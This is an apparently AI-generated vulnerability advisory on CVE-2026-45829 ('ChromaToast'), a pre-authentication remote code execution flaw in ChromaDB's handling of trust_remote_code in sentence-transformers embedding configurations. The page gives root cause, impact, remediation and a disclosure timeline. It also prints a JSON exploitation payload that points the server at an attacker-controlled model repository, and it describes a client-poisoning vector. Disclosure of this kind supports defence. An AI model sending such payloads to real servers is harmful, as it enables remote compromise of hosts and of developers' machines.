CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-45829
10.00.14%

CVE-2026-45829: Pre-Authentication Remote Code Execution in ChromaDB via ChromaToast

Amit Schendel
Amit Schendel
Senior Security Researcher

May 21, 2026·5 min read·3 visits

PoC Available

Executive Summary (TL;DR)

Unauthenticated Remote Code Execution in ChromaDB <= 1.5.8 via arbitrary code injection in the `trust_remote_code` configuration of the SentenceTransformerEmbeddingFunction.

CVE-2026-45829, commonly referred to as ChromaToast, is a critical Pre-Authentication Remote Code Execution (RCE) vulnerability affecting the ChromaDB vector database. The flaw exists in the handling of embedding function configurations during collection creation, allowing unauthenticated attackers to execute arbitrary Python code on the server or client applications.

Vulnerability Overview

ChromaDB is an open-source vector database designed for artificial intelligence applications. It provides storage, search, and retrieval capabilities for embeddings. The platform offers a Python-based server and a corresponding client SDK, facilitating interaction with various machine learning models.

CVE-2026-45829 is an unauthenticated Remote Code Execution (RCE) vulnerability affecting ChromaDB versions 1.0.0 through 1.5.8. The vulnerability involves improper input validation during the processing of embedding function configurations. This flaw allows attackers to execute arbitrary code on the host system.

The issue resides in the handling of the trust_remote_code parameter within the SentenceTransformerEmbeddingFunction. When a user requests the creation of a new collection, the server instantiates the specified embedding function based on the provided configuration. The lack of prior authentication or strict parameter filtering exposes the underlying execution engine to untrusted inputs.

Root Cause Analysis

The root cause of CVE-2026-45829 is a combination of insecure deserialization principles applied to configuration data and the unsafe default capabilities of the underlying machine learning libraries. The application processes collection configurations submitted via POST requests to the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint.

The application utilizes a function named load_create_collection_configuration_from_json to parse the incoming request body. This function accepts arbitrary keyword arguments (kwargs) and passes them directly to the specified embedding function class. In the case of the SentenceTransformerEmbeddingFunction, these arguments are passed down to the Hugging Face sentence-transformers library.

The Hugging Face library supports a parameter called trust_remote_code, which dictates whether the application should download and execute custom Python scripts associated with a model repository. By supplying a malicious repository name in the model_name field and setting trust_remote_code: true within the kwargs, an attacker forces the server to fetch and execute arbitrary code. This execution occurs prior to the implementation of FastAPI middleware security controls, bypassing any configured authentication requirements.

Attack Methodology and Exploitation

Exploitation of CVE-2026-45829 requires an attacker to host a malicious model repository on the Hugging Face Hub or a compatible registry. This repository contains the Python payload designed to execute upon initialization by the target system. The attacker then constructs a specific JSON payload to trigger the vulnerability.

The attacker issues an unauthenticated HTTP POST request to the collection creation API endpoint. The request body defines a new collection and explicitly sets the embedding_function configuration to utilize the sentence-transformers library. The configuration specifies the attacker-controlled model repository and enables the remote code execution flag.

{
  "name": "malicious_collection",
  "embedding_function": {
    "name": "sentence-transformers",
    "config": {
      "model_name": "attacker-namespace/malicious-repo",
      "kwargs": {
        "trust_remote_code": true
      }
    }
  }
}

Upon receiving this request, the ChromaDB server attempts to initialize the collection. The sentence-transformers library connects to the specified repository, downloads the model artifacts including the custom Python script, and executes the script within the context of the ChromaDB process. This results in immediate code execution without requiring prior authentication.

Secondary Attack Vector: Client Poisoning

In addition to direct server exploitation, CVE-2026-45829 introduces a secondary attack vector targeting the ChromaDB Python Client SDK. This vector relies on an attacker gaining sufficient access to modify an existing collection or create a new, poisoned collection on a centralized ChromaDB instance.

Once access is established, the attacker sets the collection's embedding function configuration to reference their malicious repository and enables the remote code flag. The server stores this configuration persistently. The vulnerability lies dormant until a legitimate user interacts with the compromised collection.

When a user connects to the poisoned collection using the Python Client SDK without explicitly defining a local embedding function, the SDK automatically retrieves the collection configuration from the server. The client application then instantiates the embedding function locally, downloading and executing the attacker's code on the client machine. This mechanism effectively transforms the ChromaDB server into a distribution point for malicious code.

Impact Assessment

The impact of CVE-2026-45829 is categorized as critical, possessing a CVSS v4.0 score of 10.0. An attacker achieving exploitation gains unauthenticated Remote Code Execution on the host running the ChromaDB server. This execution occurs with the privileges of the ChromaDB process.

Successful exploitation permits full compromise of the underlying operating system. The attacker can exfiltrate sensitive data stored within the vector database, including proprietary embeddings and associated metadata. The attacker can also modify existing data, corrupting the integrity of downstream artificial intelligence applications relying on the database.

Furthermore, the compromised system serves as a foothold for lateral movement within the target network. The secondary attack vector extends the impact beyond the server infrastructure, threatening the endpoints of developers and data scientists interacting with the database via the Python SDK.

Remediation and Mitigation

The primary remediation for CVE-2026-45829 is upgrading the ChromaDB server and client components to a version subsequent to 1.5.8. System administrators must ensure that all instances of the application, including those deployed within containerized environments, are updated to a secure release.

If immediate patching is unfeasible, administrators must disable the trust_remote_code functionality within the global server configuration. This mitigation prevents the sentence-transformers library from executing custom scripts, neutralizing the primary attack vector. Administrators should verify that this configuration change does not disrupt legitimate operations requiring remote model code.

Organizations must enforce strict network security controls around the ChromaDB API. Access to the API should be restricted using firewalls or Virtual Private Clouds (VPCs) to prevent exposure to untrusted networks. Additionally, robust authentication mechanisms, such as Static API Keys or OAuth, should be implemented to ensure only authorized entities can interact with the collection management endpoints.

Technical Appendix

CVSS Score
10.0/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Probability
0.14%
Top 67% most exploited

Affected Systems

ChromaDB Python ServerChromaDB Python Client SDK

Affected Versions Detail

Product
Affected Versions
Fixed Version
ChromaDB
Chroma
1.0.0 - 1.5.8> 1.5.8
AttributeDetail
CWE IDCWE-94
Attack VectorNetwork
CVSS v4.010.0
EPSS Score0.00139
ImpactPre-Authentication Remote Code Execution
Exploit StatusProof of Concept Available
CISA KEVNot Listed

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
T1203Exploitation for Client Execution
Execution
CWE-94
Improper Control of Generation of Code

Improper Control of Generation of Code ('Code Injection')

Known Exploits & Detection

GitHubFunctional Proof-of-Concept repository demonstrating the collection poisoning and RCE attack.

Vulnerability Timeline

Vulnerability reported to Chroma maintainers by researcher azraelxuemo
2025-11-28
Chroma team acknowledged the report and began triaging
2025-12-16
Issue #6717 detailing secondary attack vector made public on GitHub
2026-03-23
CVE-2026-45829 officially published and research disclosed by HiddenLayer
2026-05-18
First functional PoC released publicly on GitHub
2026-05-20

References & Sources

  • [1]HiddenLayer Research: ChromaToast Served Pre-Auth
  • [2]ChromaDB GitHub Issue #6717
  • [3]NVD Record for CVE-2026-45829
  • [4]CVE.org Record for CVE-2026-45829

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.